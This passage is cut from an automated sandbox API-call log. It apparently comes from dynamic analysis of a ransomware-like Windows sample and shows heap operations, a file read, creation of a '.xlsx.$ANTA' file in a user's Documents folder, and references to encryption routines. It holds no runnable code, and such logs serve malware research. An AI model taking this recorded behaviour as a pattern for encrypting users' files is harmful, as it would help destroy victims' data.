hHeap=0x1780000) returned 1 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.705] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0077.705] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431d938 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0077.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0077.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431d938 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9260 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0077.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0077.706] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0077.706] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\" (normalized: "c:\\users\\fd1hvy\\documents")) returned 0x11 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8c78 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24b0 | out: hHeap=0x1780000) returned 1 [0077.706] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0077.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e23a0 | out: hHeap=0x1780000) returned 1 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e24b0 [0077.707] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\ooKroY8WpRTqCJ.xlsx.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\ookroy8wprtqcj.xlsx.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0077.707] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e23a0 [0077.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca250 | out: hHeap=0x1780000) returned 1 [0077.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca310 | out: hHeap=0x1780000) returned 1 [0077.707] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac600 | out: hHeap=0x1780000) returned 1 [0077.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0077.708] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0077.708] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0077.708] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0077.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0077.712] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0077.712] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0077.714] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x3819, lpOverlapped=0x0) returned 1 [0077.715] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0077.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13819) returned 0x48f0048 [0077.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0077.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0077.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0077.718] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2390 | out: hHeap=0x1780000) returned 1 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2390 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13819) returned 0x4903870 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.719] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13819) returned 0x48f0048 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x48f0048 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.719] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f48 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f48 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0077.719] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0077.719] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0077.719] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0077.720] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0077.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13819) returned 0x48f0048 [0077.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26c0 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25f0 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0077.720] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2550 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0077.720] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0077.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca250 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x13819) returned 0x4917098 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0077.721] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca280 | out: hHeap=0x1780000) returned 1 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0077.721] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0077.721] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0077.722] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0077.722] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0077.722] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0077.722] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0077.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6b8 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0077.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0077.723] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0077.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0077.723] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0077.723] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0077.724] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e28a8 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0077.724] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0077.724] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: 